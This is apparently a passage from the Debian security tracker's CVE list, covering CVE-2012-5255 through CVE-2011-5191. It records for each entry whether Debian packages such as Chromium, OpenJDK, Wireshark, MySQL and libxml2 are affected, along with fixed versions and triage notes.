NOT-FOR-US: Adobe Flash Player CVE-2012-5255 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5254 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5253 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5252 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5251 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5250 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5249 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5248 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5247 RESERVED CVE-2012-5246 RESERVED CVE-2012-5245 RESERVED CVE-2012-5244 RESERVED CVE-2012-5243 RESERVED CVE-2012-5242 RESERVED CVE-2012-5241 RESERVED NOT-FOR-US: PEAR module for Twitter CVE-2012-5240 (Buffer overflow in the dissect_tlv function in ...) - wireshark 1.8.2-2 (bug #689972) [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-5239 REJECTED CVE-2012-5238 (epan/dissectors/packet-ppp.c in the PPP dissector in Wireshark 1.8.x ...) - wireshark 1.8.2-2 (bug #689972) [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-5237 (The dissect_hsrp function in epan/dissectors/packet-hsrp.c in the HSRP ...) 
- wireshark 1.8.2-2 (bug #689972) [squeeze] - wireshark (Only affects 1.8.x) CVE-2012-5236 [Admin can decrypt user files] RESERVED - owncloud (low) [wheezy] - owncloud (Low risk, requires entensive changes, will be fully fixed in 5.0) NOTE: http://owncloud.org/about/security/advisories/CVE-2012-5236/ CVE-2012-5235 RESERVED CVE-2012-5234 (Open redirect vulnerability in index.php in ocPortal before 7.1.6 ...) - ocportal (bug #625865) CVE-2012-5233 (Cross-site scripting (XSS) vulnerability in the stickynote module ...) NOT-FOR-US: Drupal stickynote CVE-2012-5232 (Cross-site scripting (XSS) vulnerability in the Quickl Form component ...) NOT-FOR-US: Joomla component CVE-2012-5231 (miniCMS 1.0 and 2.0 allows remote attackers to execute arbitrary PHP ...) NOT-FOR-US: miniCMS CVE-2012-5230 (Unspecified vulnerability in the JE Story Submit (com_jesubmit) ...) NOT-FOR-US: Joomla jesusmit CVE-2012-5229 (Cross-site scripting (XSS) vulnerability in css/gallery-css.php in the ...) NOT-FOR-US: WP Gallery2 CVE-2012-5228 (Cross-site scripting (XSS) vulnerability in admin/index.php in phplist ...) NOT-FOR-US: phplist CVE-2012-5227 (SQL injection vulnerability in administrer/tva.php in Peel SHOPPING ...) NOT-FOR-US: Peel Shopping CVE-2012-5226 (Multiple cross-site scripting (XSS) vulnerabilities in Peel SHOPPING ...) NOT-FOR-US: Peel Shopping CVE-2012-5225 (Cross-site scripting (XSS) vulnerability in webscr.php in xClick Cart ...) NOT-FOR-US: xClick CVE-2012-5224 (PHP remote file inclusion vulnerability in ...) NOT-FOR-US: vbadvanced CMPS CVE-2012-5223 (The proc_deutf function in includes/functions_vbseocp_abstract.php in ...) NOT-FOR-US: vBSEO CVE-2012-5222 (HP Service Manager Web Tier 9.31 before 9.31.2004 p2 allows remote ...) NOT-FOR-US: HP Service Manager CVE-2012-5221 (Unspecified vulnerability on the HP LaserJet 4xxx, 5200, 90xx, M30xx, ...) NOT-FOR-US: HP LaserJet CVE-2012-5220 (Unspecified vulnerability in HP Storage Data Protector 6.20, 6.21, ...) 
NOT-FOR-US: HP Storage Data Protector CVE-2012-5219 (Cross-site scripting (XSS) vulnerability in HP Managed Printing ...) NOT-FOR-US: HP Managed Printing Administration CVE-2012-5218 (HP ElitePad 900 PCs with BIOS F.0x before F.01 Update 1.0.0.8 do not ...) NOT-FOR-US: HP ElitePad 900 CVE-2012-5217 RESERVED CVE-2012-5216 (Cross-site request forgery (CSRF) vulnerability on HP ProCurve 1700-8 ...) NOT-FOR-US: HP ProCurve CVE-2012-5215 (Unspecified vulnerability on the HP LaserJet Pro M1212nf, M1213nf, ...) NOT-FOR-US: HP LaserJet Pro CVE-2012-5214 (Unspecified vulnerability in HP ServiceCenter 6.2.8 before 6.2.8.10 ...) NOT-FOR-US: HP ServiceCenter CVE-2012-5213 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5212 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5211 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5210 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5209 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5208 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5207 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5206 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5205 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5204 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) 
NOT-FOR-US: HP Intelligent Management Center CVE-2012-5203 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5202 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5201 (Unspecified vulnerability in HP Intelligent Management Center (iMC) ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5200 (Cross-site scripting (XSS) vulnerability in HP Intelligent Management ...) NOT-FOR-US: HP Intelligent Management Center CVE-2012-5199 (Unspecified vulnerability in HP ArcSight Connector Appliance 6.3 and ...) NOT-FOR-US: HP ArcSight Connector Appliance CVE-2012-5198 (Unspecified vulnerability in HP ArcSight Connector Appliance before ...) NOT-FOR-US: HP ArcSight Connector Appliance CVE-2011-5202 (BazisVirtualCDBus.sys in WinCDEmu 3.6 allows local users to cause a ...) NOT-FOR-US: WinCDEmu CVE-2012-5197 (Multiple unspecified vulnerabilities in Condor 7.6.x before 7.6.10 and ...) - condor 7.8.2~dfsg.1-1+deb7u1 (unimportant) NOTE: Not exploitable according to upstream CVE-2012-5196 (Multiple buffer overflows in Condor 7.6.x before 7.6.10 and 7.8.x ...) - condor 7.8.2~dfsg.1-1+deb7u1 (unimportant) NOTE: Not exploitable according to upstream CVE-2012-5195 (Heap-based buffer overflow in the Perl_repeatcpy function in util.c in ...) {DSA-2586-1} - perl 5.14.2-14 (bug #689314) CVE-2012-5194 RESERVED CVE-2012-5193 RESERVED CVE-2012-5192 RESERVED CVE-2012-5191 RESERVED CVE-2012-5190 RESERVED CVE-2012-5189 REJECTED CVE-2012-5188 (Untrusted search path vulnerability in mora Downloader before 1.0.0.1 ...) NOT-FOR-US: mora Downloader CVE-2012-5187 (The Weathernews Touch application 2.3.2 and earlier for Android allows ...) NOT-FOR-US: Android CVE-2012-5186 (Cross-site scripting (XSS) vulnerability in FLUGELz netmania myu-s and ...) 
NOT-FOR-US: FLUGELz netmania myu-s, PHP WeblogSystem CVE-2012-5185 (Directory traversal vulnerability in the Olive Toast Documents Pro ...) NOT-FOR-US: Olive Toast Documents Pro File Viewer CVE-2012-5184 (Cross-site scripting (XSS) vulnerability in the Olive Toast Documents ...) NOT-FOR-US: Olive Toast Documents Pro File Viewer CVE-2012-5183 (The Loctouch application 3.4.6 and earlier for Android allows ...) NOT-FOR-US: Loctouch application for Android CVE-2012-5182 (The Loctouch application 3.4.6 and earlier for Android does not ...) NOT-FOR-US: Loctouch application for Android CVE-2012-5181 (Cross-site scripting (XSS) vulnerability in concrete5 Japanese 5.5.1 ...) NOT-FOR-US: concrete5 CVE-2012-5180 (The Opera Mobile application before 12.1 and Opera Mini application ...) NOT-FOR-US: Opera Mobile application for Android CVE-2012-5179 (The Boat Browser application before 4.2 and Boat Browser Mini ...) NOT-FOR-US: Boat Browser application for Android CVE-2012-5178 (Cross-site request forgery (CSRF) vulnerability in the Welcart plugin ...) NOT-FOR-US: WordPress Welcart plugin CVE-2012-5177 (Cross-site scripting (XSS) vulnerability in the Welcart plugin before ...) NOT-FOR-US: WordPress Welcart plugin CVE-2012-5176 (Cross-site scripting (XSS) vulnerability in KENT-WEB ACCESS REPORT ...) NOT-FOR-US: KENT-WEB ACCESS REPORT CVE-2012-5175 (Cross-site scripting (XSS) vulnerability in KENT-WEB ACCESS REPORT 4.2 ...) NOT-FOR-US: KENT-WEB ACCESS REPORT CVE-2012-5174 (The KYOCERA AH-K3001V, AH-K3002V, WX300K, WX310K, WX320K, and WX320KR ...) NOT-FOR-US: KYOCERA CVE-2012-5173 (Session fixation vulnerability in BIGACE before 2.7.8 allows remote ...) NOT-FOR-US: BIGACE CVE-2012-5172 (The Asial Monaca Debugger application before 1.4.2 for Android allows ...) NOT-FOR-US: Asial Monaca Debugger CVE-2012-5171 (Directory traversal vulnerability in Be Graph BeZIP before 3.10 allows ...) 
	NOT-FOR-US: Be Graph's BeZIP
CVE-2012-5170 (Open redirect vulnerability in Pebble before 2.6.4 allows remote ...)
	NOT-FOR-US: Pebble blog
CVE-2012-5169 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: ATutor AContent
CVE-2012-5168 (ATutor AContent before 1.2-1 allows remote attackers to modify ...)
	NOT-FOR-US: ATutor AContent
CVE-2012-5167 (Multiple SQL injection vulnerabilities in ATutor AContent before 1.2-1 ...)
	NOT-FOR-US: ATutor AContent
CVE-2012-5166 (ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before ...)
	{DSA-2560-1}
	- bind9 1:9.8.1.dfsg.P1-4.3 (bug #690118)
	- isc-dhcp (issue only affects the named service, which isn't used by isc-dhcp)
CVE-2012-5165 RESERVED
CVE-2012-5164 (Multiple cross-site scripting (XSS) vulnerabilities in Fork CMS before ...)
	NOT-FOR-US: Fork CMS
CVE-2012-5163 (Cross-site scripting (XSS) vulnerability in oc-admin/ajax/ajax.php in ...)
	NOT-FOR-US: OSClass not in Debian
CVE-2012-5162 (Multiple SQL injection vulnerabilities in oc-admin/ajax/ajax.php in ...)
	NOT-FOR-US: OSClass not in Debian
CVE-2012-5161 (The XML Service interface in Citrix XenApp 6.5 and 6.5 Feature Pack 1 ...)
	NOT-FOR-US: Citrix XenApp
CVE-2012-5160 RESERVED
CVE-2012-5158 RESERVED
CVE-2012-5157 (Google Chrome before 24.0.1312.52 does not properly handle image data ...)
	- chromium-browser (PDF functionality not available in Chromium)
CVE-2012-5156 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...)
	- chromium-browser (PDF functionality not available in Chromium)
CVE-2012-5155 (Google Chrome before 24.0.1312.52 on Mac OS X does not use an ...)
	- chromium-browser (Only affects MacOS X)
CVE-2012-5154 (Integer overflow in Google Chrome before 24.0.1312.52 on Windows ...)
	- chromium-browser (Only affects Windows)
CVE-2012-5153 (Google V8 before 3.14.5.3, as used in Google Chrome before ...)
	- libv8 (bug #702261; kMinFixedIndex and kMaxFixedIndex are hard-coded to the correct values in 3.8.9.20, a later commit introduced a calculation that produced incorrect values)
	- chromium-browser 24.0.1312.68-1
	TODO: re-check uploads newer than 3.8.9.20
CVE-2012-5152 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5151 (Integer overflow in Google Chrome before 24.0.1312.52 allows remote ...)
	- chromium-browser (PDF functionality not available in Chromium)
CVE-2012-5150 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...)
	- chromium-browser 24.0.1312.68-1
	- ffmpeg
	- libav 6:0.8.6-1
CVE-2012-5149 (Integer overflow in the audio IPC layer in Google Chrome before ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5148 (The hyphenation functionality in Google Chrome before 24.0.1312.52 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5147 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5146 (Google Chrome before 24.0.1312.52 allows remote attackers to bypass ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5145 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5144 (Google Chrome before 23.0.1271.97, and Libav 0.7.x before 0.7.7 and ...)
	- chromium-browser 24.0.1312.68-1
	- ffmpeg
	- libav 6:0.8.5-1 (bug #694483)
	NOTE: http://git.libav.org/?p=libav.git;a=commitdiff;h=6d5b0092678b2a95dfe209a207550bd2fe9ef646 is supposed to fix this.
	NOTE: Upstream has a sample, but it can only be reproduced with ASan/TSan. However, Chrome seems to be affected by this somehow more directly.
CVE-2012-5143 (Integer overflow in Google Chrome before 23.0.1271.97 allows remote ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5142 (Google Chrome before 23.0.1271.97 does not properly handle history ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5141 (Google Chrome before 23.0.1271.97 does not properly restrict ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5140 (Use-after-free vulnerability in Google Chrome before 23.0.1271.97 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5139 (Use-after-free vulnerability in Google Chrome before 23.0.1271.97 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5138 (Google Chrome before 23.0.1271.95 does not properly handle file paths, ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5137 (Use-after-free vulnerability in Google Chrome before 23.0.1271.95 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5136 (Google Chrome before 23.0.1271.91 does not properly perform a cast of ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5135 (Use-after-free vulnerability in Google Chrome before 23.0.1271.91 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5134 (Heap-based buffer underflow in the xmlParseAttValueComplex function in ...)
	{DSA-2580-1}
	- libxml2 2.8.0+dfsg1-7 (bug #694521)
CVE-2012-5133 (Use-after-free vulnerability in Google Chrome before 23.0.1271.91 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5132 (Google Chrome before 23.0.1271.91 allows remote attackers to cause a ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5131 (Google Chrome before 23.0.1271.91 on Mac OS X does not properly ...)
	- chromium-browser (MacOS-specific)
CVE-2012-5130 (Skia, as used in Google Chrome before 23.0.1271.91, allows remote ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5129 (Heap-based buffer overflow in the WebGL subsystem in Google Chrome OS ...)
	- mesa 8.0.5-3 (bug #695248)
	[squeeze] - mesa (Vulnerable code not present)
CVE-2012-5128 (Google V8 before 3.13.7.5, as used in Google Chrome before ...)
	- libv8 (Doesn't affect 3.8.9, see bug #694808)
CVE-2012-5127 (Integer overflow in Google Chrome before 23.0.1271.64 allows remote ...)
	- chromium-browser 24.0.1312.68-1
	- libwebp 0.1.3-3+nmu1 (bug #704573)
	NOTE: fixed in experimental version 0.2.1-1
	NOTE: https://bugs.gentoo.org/show_bug.cgi?id=442152
	NOTE: Upstream announce: https://groups.google.com/a/webmproject.org/forum/?fromgroups=#!topic/webp-discuss/QTtgi8YfgkE
CVE-2012-5126 (Use-after-free vulnerability in Google Chrome before 23.0.1271.64 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5125 (Use-after-free vulnerability in Google Chrome before 23.0.1271.64 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5124 (Google Chrome before 23.0.1271.64 does not properly handle textures, ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5123 (Skia, as used in Google Chrome before 23.0.1271.64, allows remote ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5122 (Google Chrome before 23.0.1271.64 does not properly perform a cast of ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5121 (Use-after-free vulnerability in Google Chrome before 23.0.1271.64 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5120 (Google V8 before 3.13.7.5, as used in Google Chrome before ...)
	- libv8 (Doesn't affect 3.8.9, see bug #694808)
CVE-2012-5119 (Race condition in Pepper, as used in Google Chrome before ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5118 (Google Chrome before 23.0.1271.64 on Mac OS X does not properly ...)
	- chromium-browser (MacOS-specific)
CVE-2012-5117 (Google Chrome before 23.0.1271.64 does not properly restrict the ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5116 (Use-after-free vulnerability in Google Chrome before 23.0.1271.64 ...)
	- chromium-browser 24.0.1312.68-1
CVE-2012-5115 (Google Chrome before 23.0.1271.64 on Mac OS X does not properly ...)
	- chromium-browser (MacOS-specific)
CVE-2012-5114 RESERVED
CVE-2012-5113 RESERVED
CVE-2012-5112 (Use-after-free vulnerability in the SVG implementation in WebKit, as ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-5111 (Google Chrome before 22.0.1229.92 does not monitor for crashes of ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-5110 (The compositor in Google Chrome before 22.0.1229.92 allows remote ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-5109 (The International Components for Unicode (ICU) functionality in Google ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-5108 (Race condition in Google Chrome before 22.0.1229.92 allows remote ...)
	- chromium-browser 22.0.1229.94~r161065-1
CVE-2012-5107 RESERVED
CVE-2012-5106 RESERVED
CVE-2012-5159 (phpMyAdmin 3.5.2.2, as distributed by the cdnetworks-kr-1 mirror ...)
	- phpmyadmin
CVE-2012-5105 (Multiple cross-site scripting (XSS) vulnerabilities in SQLiteManager ...)
	NOT-FOR-US: SQLiteManager
CVE-2012-5104 (Cross-site scripting (XSS) vulnerability in forums/ubbthreads.php in ...)
	NOT-FOR-US: UBB.threads
CVE-2012-5103 (Multiple cross-site scripting (XSS) vulnerabilities in ...)
	NOT-FOR-US: Ggb guestbook
CVE-2012-5102 (Cross-site scripting (XSS) vulnerability in inc/extensions.php in ...)
	NOT-FOR-US: VertigoServ
CVE-2012-5101 (SQL injection vulnerability in the JExtensions JE Poll component ...)
	NOT-FOR-US: Joomla! extension
CVE-2012-5100 (Directory traversal vulnerability in HServer 0.1.1 allows remote ...)
	NOT-FOR-US: HServer
CVE-2012-5099 (Cross-site scripting (XSS) vulnerability in list.php in PHPB2B 4.1 and ...)
	NOT-FOR-US: PHPB2B
CVE-2012-5098 (Multiple SQL injection vulnerabilities in Php-X-Links, possibly 1.0, ...)
	NOT-FOR-US: PHP-X-Links
CVE-2012-5097 (Unspecified vulnerability in the Oracle Access Manager component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-5096 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2012-5095 (Unspecified vulnerability in Oracle Sun Solaris 10 allows local users ...)
	NOT-FOR-US: Oracle Sun Solaris 10
CVE-2012-5094 (Unspecified vulnerability in the Oracle Agile PLM for Process ...)
	NOT-FOR-US: Oracle Agile PLM
CVE-2012-5093 (Unspecified vulnerability in the Oracle Agile PLM for Process ...)
	NOT-FOR-US: Oracle Agile PLM
CVE-2012-5092 (Unspecified vulnerability in the Oracle Agile PLM for Process ...)
	NOT-FOR-US: Oracle Agile PLM
CVE-2012-5091 (Unspecified vulnerability in the Oracle Agile Product Supplier ...)
	NOT-FOR-US: Oracle Supply Chain
CVE-2012-5090 (Unspecified vulnerability in the Oracle Agile PLM for Process ...)
	NOT-FOR-US: Oracle Supply Chain
CVE-2012-5089 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5088 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5087 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5086 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
CVE-2012-5085 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5084 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5083 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to Oracle's vague disclosure policy the exact nature is unknown, but since no patch landed in IcedTea, we consider it not affected
CVE-2012-5082 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2012-5081 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5080 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2012-5079 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5078 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2012-5077 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5076 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5075 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5074 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5073 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5072 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5071 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5070 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5069 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5068 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 6b24-1.11.5-0ubuntu1 (bug #690774)
	- openjdk-7 7u3-2.1.3-1 (bug #690774)
CVE-2012-5067 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2012-5066 (Unspecified vulnerability in the Oracle Central Designer component in ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2012-5065 (Unspecified vulnerability in the Oracle WebCenter Sites component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-5064 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-5063 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-5062 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle
CVE-2012-5061 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-5060 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2012-5059 (Unspecified vulnerability in the PeopleSoft PeopleTools component in ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-5058 (Unspecified vulnerability in the Oracle iStore component in Oracle ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-5057 RESERVED
CVE-2012-5056 RESERVED
CVE-2012-5055 (DaoAuthenticationProvider in VMware SpringSource Spring Security ...)
	NOT-FOR-US: VMware
CVE-2012-5054 (Integer overflow in the copyRawDataTo method in the Matrix3D class in ...)
	NOT-FOR-US: Adobe Flash player
CVE-2012-5053 (Cross-site scripting (XSS) vulnerability in the Receiver Web User ...)
	NOT-FOR-US: Trimble Infrastructure GNSS Series Receivers
CVE-2012-5052 RESERVED
CVE-2012-5051 (Directory traversal vulnerability in VMware CapacityIQ 1.5.x allows ...)
	NOT-FOR-US: VMware
CVE-2012-5050 (Cross-site scripting (XSS) vulnerability in the server in VMware ...)
	NOT-FOR-US: VMware
CVE-2012-5049 (APIFTP Server in Optimalog Optima PLC 1.5.2 and earlier allows remote ...)
	NOT-FOR-US: Optimalog Optima PLC
CVE-2012-5048 (APIFTP Server in Optimalog Optima PLC 1.5.2 and earlier allows remote ...)
	NOT-FOR-US: Optimalog Optima PLC
CVE-2012-5047 RESERVED
CVE-2012-5046 RESERVED
CVE-2012-5045 RESERVED
CVE-2012-5044 RESERVED
CVE-2012-5043 RESERVED
CVE-2012-5042 RESERVED
CVE-2012-5041 RESERVED
CVE-2012-5040 RESERVED
CVE-2012-5039 RESERVED
CVE-2012-5038 RESERVED
CVE-2012-5037 RESERVED
CVE-2012-5036 RESERVED
CVE-2012-5035 RESERVED
CVE-2012-5034 RESERVED
CVE-2012-5033 RESERVED
CVE-2012-5032 RESERVED
CVE-2012-5031 RESERVED
CVE-2012-5030 RESERVED
CVE-2012-5029 RESERVED
CVE-2012-5028 RESERVED
CVE-2012-5027 RESERVED
CVE-2012-5026 RESERVED
CVE-2012-5025 RESERVED
CVE-2012-5024 RESERVED
CVE-2012-5023 RESERVED
CVE-2012-5022 RESERVED
CVE-2012-5021 RESERVED
CVE-2012-5020 RESERVED
CVE-2012-5019 RESERVED
CVE-2012-5018 RESERVED
CVE-2012-5017 RESERVED
CVE-2012-5016 RESERVED
CVE-2012-5015 RESERVED
CVE-2012-5014 RESERVED
CVE-2012-5013 RESERVED
CVE-2012-5012 RESERVED
CVE-2012-5011 RESERVED
CVE-2012-5010 RESERVED
CVE-2012-5009 RESERVED
CVE-2012-5008 RESERVED
CVE-2011-5201 (Multiple SQL injection vulnerabilities in sign.php in tinyguestbook ...)
	NOT-FOR-US: tinyguestbook
CVE-2011-5200 (Multiple SQL injection vulnerabilities in DeDeCMS, possibly 5.6, allow ...)
	NOT-FOR-US: DeDeCMS
CVE-2011-5199 (Cross-site scripting (XSS) vulnerability in sign.php in tinyguestbook ...)
	NOT-FOR-US: tinyguestbook
CVE-2011-5198 (SQL injection vulnerability in search.php in Neturf eCommerce Shopping ...)
	NOT-FOR-US: Neturf eCommerce Shopping Cart
CVE-2011-5197 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: Public Knowledge Project Open Harvester Systems
CVE-2011-5196 (Cross-site request forgery (CSRF) vulnerability in ...)
	- ojs (low)
	[squeeze] - ojs (Minor issue)
CVE-2011-5195 (Cross-site request forgery (CSRF) vulnerability in ...)
	NOT-FOR-US: Public Knowledge Project Open Conference Systems
CVE-2011-5194 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Wordpress Whois search plugin, not in Debian
CVE-2011-5193 (Cross-site scripting (XSS) vulnerability in ...)
	NOT-FOR-US: Wordpress Whois search plugin, not in Debian
CVE-2011-5192 (Cross-site scripting (XSS) vulnerability in pretty-bar.php in Pretty ...)
	NOT-FOR-US: Wordpress Pretty Link Lite plugin, not in Debian
CVE-2011-5191 (Cross-site scripting (XSS) vulnerability in pretty-bar.php in Pretty ...)
	NOT-FOR-US: Wordpress Pretty Link Lite plugin, not in Debian
